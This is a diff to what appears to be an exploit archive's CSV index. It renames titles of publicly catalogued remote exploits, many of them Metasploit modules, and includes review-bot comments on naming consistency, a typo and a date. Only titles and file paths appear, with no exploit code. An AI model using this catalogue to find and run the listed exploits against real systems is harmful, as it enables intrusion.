- ActiveX Buffer Overflow",2010-07-04,blake,windows,remote,0 14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 (Windows 7) - Buffer Overflow (ASLR + DEP Bypass)",2010-07-05,Node,windows,remote,0 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String",2010-07-06,l3D,windows,remote,0 -14254,platforms/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote",2010-07-06,d1dn0t,osx,remote,0 +14254,platforms/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow",2010-07-06,d1dn0t,osx,remote,0 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14272,platforms/osx/remote/14272.py,"UFO: Alien 
Invasion 2.2.1 (OSX Snow Leopard) - IRC Client Remote Code Execution (ROP)",2010-07-08,d1dn0t,osx,remote,0 14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - Code Execution",2010-07-08,webDEViL,windows,remote,0 -14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Overflow (DEP Bypass)",2010-07-09,dmc,windows,remote,0 +14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Remote Overflow (DEP Bypass)",2010-07-09,dmc,windows,remote,0 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 14385,platforms/windows/remote/14385.html,"Avant Browser 11.7 build 45 - Clickjacking",2010-07-17,"Pouya Daneshmand",windows,remote,0 14386,platforms/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 
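Review bot: 14254's new title "... (Snow Leopard) - ROP Remote Overflow" puts the exploitation technique before the vulnerability class, whereas neighbouring rows put it in a trailing parenthetical (14222 "Buffer Overflow (ASLR + DEP Bypass)", 14272 "Remote Code Execution (ROP)", and 14287 "Remote Overflow (DEP Bypass)" in this same hunk); suggest "Remote Overflow (ROP)". Separately, 14194 and 14287 are now both "Sun Java Web Server 7.0 u7 - Remote Overflow" differing only by "(DEP Bypass)"; if they target the same bug, the convention elsewhere in this file is a "(1)"/"(2)" suffix.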
@@ -10915,7 +10925,7 @@ id,file,description,date,author,platform,type,port 14580,platforms/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX HeapSpray",2010-08-08,"ThE g0bL!N",windows,remote,0 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - 'FileExists' ActiveX Buffer Overflow",2010-08-09,s-dz,windows,remote,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 -14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote",2010-08-10,sud0,windows,remote,0 +14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Command Execution",2010-08-10,sud0,windows,remote,0 14602,platforms/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Traversal",2010-08-10,kripthor,multiple,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow HeapSpray",2010-08-10,Madjix,windows,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Buffer Overflow",2010-08-10,"Rabih Mohsen",windows,remote,0 
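Review bot: 14600 goes from a bare "Remote" to "Remote Command Execution", but nothing in the diff shows where that class came from; the row is a .html file sitting among ActiveX buffer-overflow and heap-spray entries (14580, 14586, 14605), so confirm against the exploit text that it is command execution rather than an overflow before committing the more specific title. If it cannot be confirmed, the neutral "Remote Code Execution" is the safer wording.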
@@ -10930,7 +10940,7 @@ id,file,description,date,author,platform,type,port 14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com / Dell / SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0 14886,platforms/windows/remote/14886.py,"Microsoft Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (2)",2010-09-03,Abysssec,windows,remote,0 -14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote",2010-11-17,Dr_IDE,windows,remote,0 +14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction",2010-11-17,Dr_IDE,windows,remote,0 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,windows,remote,0 14925,platforms/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,linux,remote,0 14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80 
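Review bot: typo in the new 14885 title: "Remote Command Exeuction" should be "Remote Command Execution" (compare 14878 and 14895 in the same hunk). While touching this row, its date 2010-11-17 is out of step with neighbours 14878 (2010-09-03) and 14895 (2010-09-05) that the ID sequence places either side of it; worth checking the date column.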
@@ -10966,7 +10976,7 @@ id,file,description,date,author,platform,type,port 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,windows,remote,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0 -15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild'",2010-10-29,anonymous,windows,remote,0 +15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow",2010-10-29,anonymous,windows,remote,0 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 
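Review bot: 15352's new suffix "Interleaving 'document.write' / 'appendChild' Remote Overflow" stacks a mechanism, two quoted API names and the class in a row, which is hard to scan; the rest of the file leads with the quoted identifier, so "'document.write' / 'appendChild' Interleaving Remote Overflow" would read more consistently.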
@@ -11013,8 +11023,8 @@ id,file,description,date,author,platform,type,port 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 15963,platforms/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 -15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Overflow (PoC) (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 -16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Remote",2011-01-19,Dr_IDE,windows,remote,0 +15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Remote Overflow (PoC) (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 +16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution",2011-01-19,Dr_IDE,windows,remote,0 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",windows,remote,0 16041,platforms/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall - Privilege Escalation",2011-01-25,kingcope,multiple,remote,0 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 
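Review bot: the 16014 change removes "Remote" ("ActiveX 'GetDriverSettings()' Remote" becomes "... Command Execution") while every other hunk in this patch adds it; for consistency with 14885 "ActiveX Remote Command Execution" and 14878 "ActiveX 'extSetOwner()' Remote Code Execution", make it "ActiveX 'GetDriverSettings()' Remote Command Execution". 15984 "Remote Overflow (PoC) (MS11-002)" is fine.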
@@ -11091,11 +11101,11 @@ id,file,description,date,author,platform,type,port 16327,platforms/solaris/remote/16327.rb,"Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (2) (Metasploit)",2010-06-22,Metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)",2010-06-22,Metasploit,solaris,remote,0 16329,platforms/solaris/remote/16329.rb,"Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,solaris,remote,0 -16330,platforms/solaris_sparc/remote/16330.rb,"Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0 -16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 +16330,platforms/solaris_sparc/remote/16330.rb,"Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0 +16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Remote Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16333,platforms/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)",2010-04-28,Metasploit,windows,remote,0 -16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow (MS04-011) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Remote Overflow (MS04-011) (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow 
(Metasploit)",2010-12-25,Metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 
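Review bot: 16330 is one of four Samba 2.2.8 'trans2open' rows renamed in this patch (with 16861, 16876, 16880) and all four now read "'trans2open' Remote Overflow", which is consistent; but the rule being applied to the Metasploit rows is unclear, because 16331 and 16334 get "Remote Overflow" while 16332 "Veritas Backup Exec Windows - Remote Agent Overflow" and 16335 "WinComLPD 3.0.2 - Buffer Overflow" in the same hunk are left alone. If the rule is "titles ending in a bare '- Overflow'", say so in the commit message; otherwise 16335 should get the same treatment.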
@@ -11125,13 +11135,13 @@ id,file,description,date,author,platform,type,port 16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit)",2011-02-17,Metasploit,windows,remote,0 16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)",2011-01-21,Metasploit,windows,remote,0 16363,platforms/windows/remote/16363.rb,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow (MS06-025) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' Overflow 'SMB' (MS07-029) (Metasploit)",2010-09-28,Metasploit,windows,remote,0 +16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Remote Overflow (MS06-025) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 +16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)",2010-09-28,Metasploit,windows,remote,0 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)",2011-02-17,Metasploit,windows,remote,0 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16369,platforms/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow (MS04-031) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 
+16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16373,platforms/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16374,platforms/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution (Metasploit)",2010-12-02,Metasploit,windows,remote,0 
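Review bot: 16366's new title "'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029)" leaves the transport as a trailing quoted token, which reads oddly next to its TCP twin 16748 "'extractQuotedChar()' TCP Overflow (MS07-029)" later in the patch; suggest "'extractQuotedChar()' SMB Overflow (MS07-029)" so the pair differ only by transport. 16364 and 16371 are fine.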
@@ -11161,9 +11171,9 @@ id,file,description,date,author,platform,type,port 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 +16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16404,platforms/windows/remote/16404.rb,"Computer Associates ARCserve - REPORTREMOTEEXECUTECML Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 -16405,platforms/windows/remote/16405.rb,"CA BrightStor Universal Agent - Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 +16405,platforms/windows/remote/16405.rb,"CA BrightStor Universal Agent - Remote Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16406,platforms/windows/remote/16406.rb,"CA BrightStor Discovery Service - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16407,platforms/windows/remote/16407.rb,"CA BrightStor ARCserve - Tape Engine Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16408,platforms/windows/remote/16408.rb,"CA BrightStor Discovery Service - TCP Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 
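Review bot: 16403 and 16405 become "Remote Overflow" while the surrounding CA BrightStor rows in the same hunk are more specific (16401 "Message Engine Heap Overflow", 16406 "Stack Buffer Overflow", 16408 "TCP Overflow"); if the module descriptions give the overflow type, use it, otherwise at least "Remote Buffer Overflow" so the wording matches 16400 and 16402.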
@@ -11224,7 +11234,7 @@ id,file,description,date,author,platform,type,port 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 -16466,platforms/win_x86/remote/16466.rb,"Knox Arkeia Backup Client Type 77 (Windows x86) - Overflow (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 +16466,platforms/win_x86/remote/16466.rb,"Knox Arkeia Backup Client Type 77 (Windows x86) - Remote Overflow (Metasploit)",2010-05-09,Metasploit,win_x86,remote,0 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)",2011-01-08,Metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)",2010-04-30,Metasploit,windows,remote,0 
@@ -11373,7 +11383,7 @@ id,file,description,date,author,platform,type,port 16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128 -16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7787 +16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7787 16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 Beta 5 - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,26000 16695,platforms/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - 'STMux.exe' Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,1533 
@@ -11387,7 +11397,7 @@ id,file,description,date,author,platform,type,port 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 - Password Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 -16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 - 'Username' Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 
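Review bot: 16707 becomes "freeFTPd 1.0 - 'Username' Remote Overflow", but 16706 "War-FTPD 1.65 - Password Overflow (Metasploit)" on the line directly above is left as is, even though this same patch renames its sibling 16724 "War-FTPD 1.65 - 'Username' Overflow" to "'Username' Remote Overflow"; rename 16706 to "'Password' Remote Overflow" (quotes and "Remote") so the two War-FTPD rows match, or leave 16707 and 16724 alone.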
@@ -11404,13 +11414,13 @@ id,file,description,date,author,platform,type,port 16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD) (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5554 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 16729,platforms/windows/remote/16729.rb,"SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 -16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 +16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Remote Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 16732,platforms/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) 
(1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 @@ -11429,7 +11439,7 @@ id,file,description,date,author,platform,type,port 16746,platforms/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093 16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit)",2010-05-09,Metasploit,windows,remote,2103 16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' TCP Overflow (MS07-029) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 -16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow (MS03-026) (Metasploit)",2011-01-11,Metasploit,windows,remote,0 +16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)",2011-01-11,Metasploit,windows,remote,0 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)",2010-07-25,Metasploit,windows,remote,0 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 16752,platforms/windows/remote/16752.rb,"Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,80 
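Review bot: in the 16724/16730 hunk, 16731 "Oracle 9i XDB (Windows x86) - FTP PASS Overflow" sits between the two renamed rows and keeps the unquoted, "Remote"-less form, so the hunk leaves three FTP-command overflows in three styles ("'Username' Remote Overflow", "'LIST' Concatenation Overflow", "FTP PASS Overflow"); quote the command and add "Remote" on 16731 too if that is the rule. In the 16749 hunk, "Microsoft RPC DCOM Interface - Remote Overflow (MS03-026)" is fine as is.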
@@ -11445,12 +11455,12 @@ id,file,description,date,author,platform,type,port 16762,platforms/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,80 16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit)",2010-04-30,Metasploit,win_x86,remote,8000 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,windows,remote,0 -16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - 'Database' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999 +16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - 'Database' Remote Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,8080 16767,platforms/windows/remote/16767.rb,"IA WebMail Server 3.x - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 - iMonitor Remote Stack Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,8008 -16770,platforms/windows/remote/16770.rb,"Savant Web Server 3.1 - Overflow (Metasploit)",2010-10-04,Metasploit,windows,remote,0 +16770,platforms/windows/remote/16770.rb,"Savant Web Server 3.1 - Remote Overflow (Metasploit)",2010-10-04,Metasploit,windows,remote,0 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow (Metasploit)",2010-08-17,Metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)",2010-08-06,Metasploit,windows,remote,80 
16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8028 @@ -11463,7 +11473,7 @@ id,file,description,date,author,platform,type,port 16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager (OV NNM) - 'Snmp.exe' CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0 16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0 16782,platforms/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote,0 -16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0 +16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit)",2010-11-22,Metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80 16786,platforms/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,7144 
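Review bot: 16783 is stored under platforms/win_x86 with platform win_x86, but its new title "McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow" carries no "(Windows x86)" tag, unlike 16782 "Apache (Windows x86) - Chunked Encoding" and 16786 "PeerCast 0.1216 (Windows x86)" in the same hunk; add the tag for consistency. In the 16765/16770 hunk, 16765 "MaxDB WebDBM - 'Database' Remote Overflow" follows the quoted-parameter style used elsewhere and 16770 is fine.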
